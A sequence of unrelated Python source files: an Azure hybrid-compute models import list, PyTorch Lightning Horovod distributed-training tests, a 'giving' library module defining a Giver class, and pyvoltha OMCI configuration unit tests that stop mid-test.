from ._models_py3 import MachineUpdatePropertiesAutoGenerated
from ._models_py3 import OSProfile
from ._models_py3 import OperationListResult
from ._models_py3 import OperationValue
from ._models_py3 import OperationValueDisplay
from ._models_py3 import OperationValueDisplayAutoGenerated
from ._models_py3 import Resource
from ._models_py3 import TrackedResource
from ._models_py3 import UpdateResource
except (SyntaxError, ImportError):
from ._models import ErrorDetail # type: ignore
from ._models import ErrorResponse # type: ignore
from ._models import Identity # type: ignore
from ._models import LocationData # type: ignore
from ._models import Machine # type: ignore
from ._models import MachineExtension # type: ignore
from ._models import MachineExtensionInstanceView # type: ignore
from ._models import MachineExtensionInstanceViewStatus # type: ignore
from ._models import MachineExtensionProperties # type: ignore
from ._models import MachineExtensionPropertiesAutoGenerated # type: ignore
from ._models import MachineExtensionPropertiesInstanceView # type: ignore
from ._models import MachineExtensionUpdate # type: ignore
from ._models import MachineExtensionUpdateProperties # type: ignore
from ._models import MachineExtensionUpdatePropertiesAutoGenerated # type: ignore
from ._models import MachineExtensionsListResult # type: ignore
from ._models import MachineIdentity # type: ignore
from ._models import MachineListResult # type: ignore
from ._models import MachineProperties # type: ignore
from ._models import MachinePropertiesAutoGenerated # type: ignore
from ._models import MachinePropertiesOsProfile # type: ignore
from ._models import MachineUpdate # type: ignore
from ._models import MachineUpdateIdentity # type: ignore
from ._models import MachineUpdateProperties # type: ignore
from ._models import MachineUpdatePropertiesAutoGenerated # type: ignore
from ._models import OSProfile # type: ignore
from ._models import OperationListResult # type: ignore
from ._models import OperationValue # type: ignore
from ._models import OperationValueDisplay # type: ignore
from ._models import OperationValueDisplayAutoGenerated # type: ignore
from ._models import Resource # type: ignore
from ._models import TrackedResource # type: ignore
from ._models import UpdateResource # type: ignore
from ._hybrid_compute_management_client_enums import (
InstanceViewTypes,
StatusLevelTypes,
StatusTypes,
)
__all__ = [
'ErrorDetail',
'ErrorResponse',
'Identity',
'LocationData',
'Machine',
'MachineExtension',
'MachineExtensionInstanceView',
'MachineExtensionInstanceViewStatus',
'MachineExtensionProperties',
'MachineExtensionPropertiesAutoGenerated',
'MachineExtensionPropertiesInstanceView',
'MachineExtensionUpdate',
'MachineExtensionUpdateProperties',
'MachineExtensionUpdatePropertiesAutoGenerated',
'MachineExtensionsListResult',
'MachineIdentity',
'MachineListResult',
'MachineProperties',
'MachinePropertiesAutoGenerated',
'MachinePropertiesOsProfile',
'MachineUpdate',
'MachineUpdateIdentity',
'MachineUpdateProperties',
'MachineUpdatePropertiesAutoGenerated',
'OSProfile',
'OperationListResult',
'OperationValue',
'OperationValueDisplay',
'OperationValueDisplayAutoGenerated',
'Resource',
'TrackedResource',
'UpdateResource',
'InstanceViewTypes',
'StatusLevelTypes',
'StatusTypes',
]
|
py | 1a38b12d37ba02758e99a267621af7ba292ccd08 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import platform
import shlex
import subprocess
import sys
import numpy as np
import pytest
import torch
from sklearn.metrics import accuracy_score
import tests.base.develop_pipelines as tpipes
import tests.base.develop_utils as tutils
from pytorch_lightning import Trainer
from pytorch_lightning.accelerators.horovod_accelerator import HorovodAccelerator
from pytorch_lightning.core.step_result import EvalResult, Result, TrainResult
from pytorch_lightning.metrics.classification.accuracy import Accuracy
from pytorch_lightning.utilities import APEX_AVAILABLE, NATIVE_AMP_AVAILABLE, HOROVOD_AVAILABLE, _module_available
from tests.base import EvalModelTemplate
from tests.base.boring_model import BoringModel
from tests.base.models import BasicGAN
if HOROVOD_AVAILABLE:
import horovod
import horovod.torch as hvd
# This script will run the actual test model training in parallel
TEST_SCRIPT = os.path.join(os.path.dirname(__file__), 'data', 'horovod', 'train_default_model.py')
try:
from horovod.common.util import nccl_built
nccl_built()
except (ImportError, ModuleNotFoundError, AttributeError):
HOROVOD_NCCL_AVAILABLE = False
finally:
HOROVOD_NCCL_AVAILABLE = True
def _run_horovod(trainer_options, on_gpu=False):
"""Execute the training script across multiple workers in parallel."""
num_processes = trainer_options.get('gpus', 2)
# for Horovod, we interpret `gpus` to be set per worker
trainer_options.update(gpus=1 if on_gpu else None)
tutils.reset_seed()
cmdline = [
'horovodrun',
'-np', str(num_processes),
sys.executable, TEST_SCRIPT,
'--trainer-options', shlex.quote(json.dumps(trainer_options))
]
if on_gpu:
cmdline += ['--on-gpu']
exit_code = subprocess.call(' '.join(cmdline), shell=True, env=os.environ.copy())
assert exit_code == 0
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu(enable_pl_optimizer, tmpdir):
"""Test Horovod running multi-process on CPU."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
distributed_backend='horovod',
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu_implicit(enable_pl_optimizer, tmpdir):
"""Test Horovod without specifying a backend, inferring from env set by `horovodrun`."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
def test_horovod_multi_gpu(tmpdir):
"""Test Horovod with multi-GPU support."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod'
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not APEX_AVAILABLE, reason="test requires apex")
def test_horovod_apex(tmpdir):
"""Test Horovod with multi-GPU support using apex amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='apex',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skip(reason="Skip till Horovod fixes integration with Native torch.cuda.amp")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not NATIVE_AMP_AVAILABLE, reason="test requires torch.cuda.amp")
def test_horovod_amp(tmpdir):
"""Test Horovod with multi-GPU support using native amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='native',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(not torch.cuda.is_available(), reason="test requires GPU machine")
def test_horovod_transfer_batch_to_gpu(tmpdir):
class TestTrainingStepModel(EvalModelTemplate):
def training_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).training_step(batch, *args, **kwargs)
def validation_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).validation_step(batch, *args, **kwargs)
hparams = EvalModelTemplate.get_default_hparams()
model = TestTrainingStepModel(**hparams)
trainer_options = dict(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=1,
deterministic=True,
distributed_backend='horovod'
)
tpipes.run_model_test_without_loggers(trainer_options, model)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_multi_optimizer(enable_pl_optimizer, tmpdir):
model = BasicGAN(**EvalModelTemplate.get_default_hparams())
# fit model
trainer = Trainer(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
distributed_backend='horovod',
enable_pl_optimizer=enable_pl_optimizer,
)
result = trainer.fit(model)
assert result == 1, 'model failed to complete'
assert len(trainer.optimizers) == 2
for i, optimizer in enumerate(trainer.optimizers):
assert hasattr(optimizer, 'synchronize'), 'optimizer has not been wrapped into DistributedOptimizer'
def get_model_params(model):
return set([p for p in model.parameters()])
def get_optimizer_params(optimizer):
return set([p for group in optimizer.param_groups for p in group.get('params', [])])
assert get_model_params(model.generator) != get_model_params(model.discriminator)
assert get_model_params(model.generator) == get_optimizer_params(trainer.optimizers[0])
assert get_model_params(model.discriminator) == get_optimizer_params(trainer.optimizers[1])
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_result_reduce_horovod(enable_pl_optimizer, tmpdir):
"""Make sure result logging works with Horovod.
This test mirrors tests/core/test_results.py::_ddp_test_fn
"""
tutils.reset_seed()
tutils.set_random_master_port()
def hvd_test_fn():
path_here = os.path.abspath(os.path.dirname(__file__))
path_root = os.path.abspath(os.path.join(path_here, '..', '..'))
sys.path.insert(0, os.path.abspath(path_root))
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
self.training_step_called = True
tensor = torch.tensor([1.0])
self.log("test_tensor", tensor, sync_dist=True, sync_dist_op='sum',
on_step=True, on_epoch=True)
res = self._results
# Check that `tensor` is summed across all ranks automatically
assert res["test_tensor"].item() == hvd.size(), \
"Result-Log does not work properly with Horovod and Tensors"
def training_epoch_end(self, outputs) -> None:
assert len(outputs) == 0
model = TestModel()
model.val_dataloader = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
enable_pl_optimizer=enable_pl_optimizer,
)
trainer.fit(model)
horovod.run(hvd_test_fn, np=2)
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
def test_accuracy_metric_horovod():
num_batches = 10
batch_size = 16
threshold = 0.5
def sk_metric(preds, target):
sk_preds = (preds.view(-1).numpy() >= threshold).astype(np.uint8)
sk_target = target.view(-1).numpy()
return accuracy_score(y_true=sk_target, y_pred=sk_preds)
preds = torch.rand(num_batches, batch_size)
target = torch.randint(high=2, size=(num_batches, batch_size))
def _compute_batch():
trainer = Trainer(
fast_dev_run=True,
distributed_backend='horovod',
)
accelerator_backend = trainer.accelerator_connector.select_accelerator()
assert isinstance(accelerator_backend, HorovodAccelerator)
metric = Accuracy(compute_on_step=True,
dist_sync_on_step=True,
dist_sync_fn=accelerator_backend.gather_all_tensors,
threshold=threshold)
for i in range(hvd.rank(), num_batches, hvd.size()):
batch_result = metric(preds[i], target[i])
if hvd.rank() == 0:
dist_preds = torch.stack([preds[i + r] for r in range(hvd.size())])
dist_target = torch.stack([target[i + r] for r in range(hvd.size())])
sk_batch_result = sk_metric(dist_preds, dist_target)
assert np.allclose(batch_result.numpy(), sk_batch_result)
# check on all batches on all ranks
result = metric.compute()
assert isinstance(result, torch.Tensor)
total_preds = torch.stack([preds[i] for i in range(num_batches)])
total_target = torch.stack([target[i] for i in range(num_batches)])
sk_result = sk_metric(total_preds, total_target)
assert np.allclose(result.numpy(), sk_result)
horovod.run(_compute_batch, np=2)
# @pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
# def test_horovod_multi_optimizer_with_scheduling_stepping(tmpdir):
# hparams = EvalModelTemplate.get_default_hparams()
# model = EvalModelTemplate(**hparams)
# model.configure_optimizers = model.configure_optimizers__multiple_schedulers
#
# num_workers = 8
# init_lr = hparams.get('learning_rate') * num_workers
#
# with patch('pytorch_lightning.accelerators.horovod_backend.hvd.size') as mock_hvd_size:
# mock_hvd_size.return_value = 8
#
# # fit model
# trainer = Trainer(
# default_root_dir=tmpdir,
# max_epochs=1,
# limit_val_batches=0.5,
# limit_train_batches=0.2,
# distributed_backend='horovod'
# )
# results = trainer.fit(model)
# assert results == 1
#
# adjusted_lr1 = [pg['lr'] for pg in trainer.optimizers[0].param_groups][0]
# adjusted_lr2 = [pg['lr'] for pg in trainer.optimizers[1].param_groups][0]
#
# # Called ones after end of epoch with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr1
#
# # Called every 3 steps, meaning for 1 epoch of 11 batches, it is called 3 times with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr2
|
py | 1a38b13744af4dc3d4ef1b541f4a470a2a491df9 | import ast
import sys
import time
from collections import namedtuple
from contextlib import contextmanager
from contextvars import ContextVar
from itertools import count
from varname import ImproperUseError, VarnameRetrievingError, argname, varname
from varname.utils import get_node
global_context = ContextVar("global_context", default=())
global_inherited = ContextVar("global_inherited", default={})
_block_classes = {
ast.If: ("body", "orelse"),
ast.For: ("body", "orelse"),
ast.While: ("body", "orelse"),
ast.FunctionDef: ("body",),
ast.AsyncFunctionDef: ("body",),
ast.With: ("body",),
ast.AsyncWith: ("body",),
ast.AsyncFor: ("body", "orelse"),
}
_improper_nullary_give_error = (
"give() with no arguments must immediately follow an assignment"
)
special_keys = {}
global_count = count(0)
def register_special(key):
"""Return a decorator to register a function for a special key.
The function is called with no arguments whenever the special key is
requested, e.g. with ``Giver(special=["$specialkey"])``.
Use ``sys._getframe(3)`` to get the frame in which give() was called.
Example:
.. code-block:: python
@register_special("$time")
def _special_time():
return time.time()
Arguments:
key: The key, conventionally starting with a "$".
"""
def deco(func):
special_keys[key] = func
return func
return deco
@register_special("$time")
def _special_time():
return time.time()
@register_special("$frame")
def _special_frame():
return sys._getframe(3)
LinePosition = namedtuple("LinePosition", ["name", "filename", "lineno"])
@register_special("$line")
def _special_line():
fr = sys._getframe(3)
co = fr.f_code
return LinePosition(co.co_name, co.co_filename, fr.f_lineno)
def _find_targets(target):
if isinstance(target, ast.Tuple):
results = []
for t in target.elts:
results += _find_targets(t)
return results
else:
return [target.id]
def _find_above(frame):
node = get_node(frame + 1)
if node is None:
raise VarnameRetrievingError(
"Cannot retrieve the node where the function is called"
)
while node.parent is not None:
parent = node.parent
fields = _block_classes.get(type(parent), None)
if fields is None:
node = parent
continue
else:
for field in fields:
f = getattr(parent, field)
if node in f:
idx = f.index(node)
if idx == 0:
raise ImproperUseError(_improper_nullary_give_error)
assignment = f[idx - 1]
if isinstance(assignment, ast.Assign):
target = assignment.targets[-1]
names = _find_targets(target)
elif isinstance(assignment, (ast.AugAssign, ast.AnnAssign)):
names = [assignment.target.id]
else:
raise ImproperUseError(_improper_nullary_give_error)
fr = sys._getframe(frame)
rval = {}
for name in names:
if name in fr.f_locals:
rval[name] = fr.f_locals[name]
elif name in fr.f_globals:
rval[name] = fr.f_globals[name]
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve value")
return rval
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not find node position")
# I am not sure how to trigger this
raise Exception("Could not find node") # pragma: no cover
def resolve(frame, func, args):
"""Return a {variable_name: value} dictionary depending on usage.
* ``len(args) == 0`` => Use the variable assigned in the line before the call.
* ``len(args) == 1`` => Use the variable the call is assigned to.
* ``len(args) >= 1`` => Use the variables passed as arguments to the call.
Arguments:
frame: The number of frames to go up to find the context.
func: The Giver object that was called.
args: The arguments given to the Giver.
"""
nargs = len(args)
if nargs == 0:
return _find_above(frame=frame + 2)
if nargs == 1:
try:
assigned_to = varname(frame=frame + 1, strict=True, raise_exc=False)
except ImproperUseError:
assigned_to = None
if assigned_to is not None:
return {assigned_to: args[0]}
argnames = argname("args", func=func, frame=frame + 1, vars_only=False)
if argnames is None: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve arg names")
return {name: value for name, value in zip(argnames, args)}
class Giver:
"""Giver of key/value pairs.
``Giver`` is the class of the ``give`` object.
Arguments:
keys:
List of default keys to give. If ``keys=["x"]``, then
``self(123)`` will give ``{"x": 123}``.
special:
List of special keys to give (e.g. "$line", "$time", etc.)
extra:
Extra key/value pairs to give.
context:
The ContextVar that contains a list of handlers to call
when something is given.
inherited:
A ContextVar to use for inherited key/value pairs to give,
as set by ``with self.inherit(key=value): ...``.
transform:
A function from dict to dict that modifies the values to
give.
"""
def __init__(
self,
*,
keys=None,
special=[],
extra={},
context=global_context,
inherited=global_inherited,
transform=None,
):
self.keys = keys
self.special = special
self.extra = extra
self.context = context
self.inherited = inherited
self.transform = transform
def copy(
self,
keys=None,
special=None,
extra=None,
context=None,
inherited=None,
transform=None,
):
"""Copy this Giver with modified parameters."""
return type(self)(
keys=self.keys if keys is None else keys,
special=self.special if special is None else special,
extra=self.extra if extra is None else extra,
context=self.context if context is None else context,
inherited=self.inherited if inherited is None else inherited,
transform=self.transform if transform is None else transform,
)
@property
def line(self):
"""Return a giver that gives the line where it is called."""
return self.copy(special=(*self.special, "$line"))
@property
def time(self):
"""Return a giver that gives the time where it is called."""
return self.copy(special=(*self.special, "$time"))
@contextmanager
def inherit(self, **keys):
"""Create a context manager within which extra values are given.
.. code-block:: python
with give.inherit(a=1):
give(b=2) # gives {"a": 1, "b": 2}
Arguments:
keys: The key/value pairs to give within the block.
"""
inh = self.inherited.get()
token = self.inherited.set({**inh, **keys})
try:
yield
finally:
self.inherited.reset(token)
@contextmanager
def wrap(self, name, **keys):
"""Create a context manager that marks the beginning/end of the block.
``wrap`` first creates a unique ID to identify the block,
then gives the ``$wrap`` sentinel with name, uid and step="begin"
at the beginning of it gives the same ``$wrap`` but with step="end"
at the end of the block.
:meth:`giving.gvn.ObservableProxy.wrap` is the corresponding
method on the ObservableProxy returned by ``given()`` and it
can be used to wrap another context manager on the same block.
:meth:`giving.gvn.ObservableProxy.group_wrap` is another method
that uses the sentinels produced by ``wrap``.
.. code-block:: python
with give.wrap("W", x=1): # gives: {"$wrap": {"name": "W", "step": "begin", "id": ID}, "x": 1}
...
# end block, gives: {"$wrap": {"name": "W", "step": "end", "id": ID}, "x": 1}
Arguments:
name: The name to associate to this wrap block.
keys: Extra key/value pairs to give along with the sentinels.
"""
num = next(global_count)
self.produce({"$wrap": {"name": name, "step": "begin", "id": num}, **keys})
try:
yield
finally:
self.produce({"$wrap": {"name": name, "step": "end", "id": num}, **keys})
@contextmanager
def wrap_inherit(self, name, **keys):
"""Shorthand for using wrap and inherit.
.. code-block:: python
with give.wrap_inherit("W", a=1):
...
Is equivalent to:
.. code-block:: python
with give.inherit(a=1):
with give.wrap("W"):
...
Arguments:
name: The name to associate to this wrap block.
keys: Key/value pairs to inherit.
"""
with self.inherit(**keys):
with self.wrap(name):
yield
def produce(self, values):
"""Give the values dictionary."""
for special in self.special:
values[special] = special_keys[special]()
if self.extra:
values = {**self.extra, **values}
inh = self.inherited.get()
if inh is not None:
values = {**inh, **values}
for handler in self.context.get():
handler(values)
def variant(self, fn):
"""Create a version of give that transforms the data.
.. code-block:: python
@give.variant
def give_image(data):
return {"image": data}
...
give_image(x, y) # gives {"image": {"x": x, "y": y}}
Arguments:
fn: A function from a dict to a dict.
give: The base give function to wrap (defaults to global give).
"""
return self.copy(transform=fn)
def __call__(self, *args, **values):
"""Give the args and values."""
h = self.context.get()
if h:
if self.keys:
if len(args) != len(self.keys):
raise ImproperUseError(
f"Giver for {self.keys} must have {len(self.keys)} positional argument(s)."
)
keyed = dict(zip(self.keys, args))
values = {**keyed, **values}
elif args:
values = {**resolve(1, self, args), **values}
elif not values:
values = resolve(1, self, ())
if self.transform:
values = self.transform(values)
self.produce(values)
if len(args) == 1:
return args[0]
else:
return None
def giver(*keys, **extra):
"""Create a Giver to give the specified keys, plus extra values.
.. code-block:: python
g = giver("x", y=1)
give(3) # gives {"x": 3, "y": 1}
"""
normal = [k for k in keys if not k.startswith("$")]
special = [k for k in keys if k.startswith("$")]
return Giver(keys=normal, special=special, extra=extra)
|
py | 1a38b1cdc51da7d4f517c932d90623d3f365ab7d | #
# Copyright 2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from hashlib import md5
from unittest import TestCase, main
from nose.tools import raises
from nose.twistedtools import deferred
from copy import deepcopy
from .mock.mock_adapter_agent import MockAdapterAgent, MockCore
from .mock.mock_onu_handler import MockOnuHandler
from .mock.mock_olt_handler import MockOltHandler
from .mock.mock_onu import MockOnu
from pyvoltha.adapters.extensions.omci.openomci_agent import OpenOMCIAgent, OpenOmciAgentDefaults
from pyvoltha.adapters.extensions.omci.onu_configuration import OMCCVersion
from pyvoltha.adapters.extensions.omci.omci_defs import *
from pyvoltha.adapters.extensions.omci.omci_entities import OntG, Ont2G, Cardholder, \
CircuitPack, SoftwareImage, AniG, UniG
from pyvoltha.common.utils.asleep import asleep
from pyvoltha.adapters.extensions.omci.database.mib_db_dict import MibDbVolatileDict
from datetime import datetime
DEFAULT_OLT_DEVICE_ID = 'default_olt_mock'
DEFAULT_ONU_DEVICE_ID = 'default_onu_mock'
DEFAULT_PON_ID = 0
DEFAULT_ONU_ID = 0
DEFAULT_ONU_SN = 'TEST00000001'
OP = EntityOperations
RC = ReasonCodes
class TestOmciConfiguration(TestCase):
"""
Test the OMCI read-only Configuration library methods
"""
def setUp(self):
self.adapter_agent = MockAdapterAgent()
custom = deepcopy(OpenOmciAgentDefaults)
custom['mib-synchronizer']['database'] = MibDbVolatileDict
self.omci_agent = OpenOMCIAgent(MockCore, support_classes=custom)
self.omci_agent.start()
def tearDown(self):
if self.omci_agent is not None:
self.omci_agent.stop()
if self.adapter_agent is not None:
self.adapter_agent.tearDown()
def setup_mock_olt(self, device_id=DEFAULT_OLT_DEVICE_ID):
handler = MockOltHandler(self.adapter_agent, device_id)
self.adapter_agent.add_device(handler.device)
return handler
def setup_mock_onu(self, parent_id=DEFAULT_OLT_DEVICE_ID,
device_id=DEFAULT_ONU_DEVICE_ID,
pon_id=DEFAULT_PON_ID,
onu_id=DEFAULT_ONU_ID,
serial_no=DEFAULT_ONU_SN):
handler = MockOnuHandler(self.adapter_agent, parent_id, device_id, pon_id, onu_id)
handler.serial_number = serial_no
onu = MockOnu(serial_no, self.adapter_agent, handler.device_id) \
if serial_no is not None else None
handler.onu_mock = onu
return handler
def setup_one_of_each(self):
# Most tests will use at lease one or more OLT and ONU
self.olt_handler = self.setup_mock_olt()
self.onu_handler = self.setup_mock_onu(parent_id=self.olt_handler.device_id)
self.onu_device = self.onu_handler.onu_mock
self.adapter_agent.add_child_device(self.olt_handler.device,
self.onu_handler.device)
# Add device to OpenOMCI
self.onu_device = self.omci_agent.add_device(DEFAULT_ONU_DEVICE_ID,
self.adapter_agent)
# Allow timeout trigger support while in disabled state for mib sync
# to make tests run cleanly while profiling.
self.onu_device.mib_synchronizer.machine.add_transition('timeout', 'disabled', 'disabled')
def not_called(self, _reason):
assert False, 'Should never be called'
def _stuff_database(self, entries):
"""
Stuff the MIB database with some entries that we will use during tests
"""
database = self.onu_device.mib_synchronizer._database
# Stuff a value into last in sync. This makes it look like
# the ONU has been in in-sync at least once.
self.onu_device.mib_synchronizer.last_mib_db_sync = datetime.utcnow()
# Entry is a tuple of (class_id, instance_id, {attributes})
for entry in entries:
database.set(DEFAULT_ONU_DEVICE_ID, entry[0], entry[1], entry[2])
def test_OMCCVersion(self):
for key, value in OMCCVersion.__members__.items():
self.assertEqual(OMCCVersion.to_enum(OMCCVersion[key].value), value)
self.assertEqual(OMCCVersion.to_enum(-1), OMCCVersion.Unknown)
@deferred(timeout=50000)
def test_defaults(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
@raises(AssertionError)
def do_my_tests(_results):
config = self.onu_device.configuration
# Should raise assertion if never been synchronized
config.version
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs. This is a waiting
# Async task from when the OpenOMCIAgent was started. But also start the
# device so that it's queued async state machines can run as well
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_but_empty(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
def stuff_db(_results):
self._stuff_database([])
def do_my_tests(_results):
config = self.onu_device.configuration
# On no Class ID for requested property, None should be
# returned
self.assertIsNone(config.version)
self.assertIsNone(config.traffic_management_option)
self.assertIsNone(config.onu_survival_time)
self.assertIsNone(config.equipment_id)
self.assertIsNone(config.omcc_version)
self.assertIsNone(config.vendor_product_code)
self.assertIsNone(config.total_priority_queues)
self.assertIsNone(config.total_traffic_schedulers)
self.assertIsNone(config.total_gem_ports)
self.assertIsNone(config.uptime)
self.assertIsNone(config.connectivity_capability)
self.assertIsNone(config.qos_configuration_flexibility)
self.assertIsNone(config.priority_queue_scale_factor)
self.assertIsNone(config.cardholder_entities)
self.assertIsNone(config.circuitpack_entities)
self.assertIsNone(config.software_images)
self.assertIsNone(config.ani_g_entities)
self.assertIsNone(config.uni_g_entities)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
version = 'abcDEF'
tm_opt = 2
onu_survival = 123
def stuff_db(_results):
self._stuff_database([
(OntG.class_id, 0, {'version': version,
'traffic_management_options': tm_opt,
'ont_survival_time': onu_survival
})])
def do_my_tests(_results):
config = self.onu_device.configuration
# On no Class ID for requested property, None should be
# returned
self.assertEqual(config.version, version)
self.assertEqual(config.traffic_management_option, tm_opt)
self.assertEqual(config.onu_survival_time, onu_survival)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_2g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
equip_id = 'br-549'
omcc_ver = OMCCVersion.G_988_2012
vend_code = 0x1234
queues = 64
scheds = 8
gem_ports = 24
uptime = 12345
conn_capp = 0x00aa
qos_flex = 0x001b
queue_scale = 1
def stuff_db(_results):
self._stuff_database([
(Ont2G.class_id, 0, {'equipment_id': equip_id,
'omcc_version': omcc_ver.value,
'vendor_product_code': vend_code,
'total_priority_queue_number': queues,
'total_traffic_scheduler_number': scheds,
'total_gem_port_id_number': gem_ports,
'sys_uptime': uptime,
'connectivity_capability': conn_capp,
'qos_configuration_flexibility': qos_flex,
'priority_queue_scale_factor': queue_scale
})])
def do_my_tests(_results):
config = self.onu_device.configuration
self.assertEqual(config.equipment_id, equip_id)
self.assertEqual(config.omcc_version, omcc_ver)
self.assertEqual(config.vendor_product_code, vend_code)
self.assertEqual(config.total_priority_queues, queues)
self.assertEqual(config.total_traffic_schedulers, scheds)
self.assertEqual(config.total_gem_ports, gem_ports)
self.assertEqual(config.uptime, uptime)
self.assertEqual(config.connectivity_capability, conn_capp)
self.assertEqual(config.qos_configuration_flexibility, qos_flex)
self.assertEqual(config.priority_queue_scale_factor, queue_scale)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_cardholder_values(self):
self.setup_one_of_each()
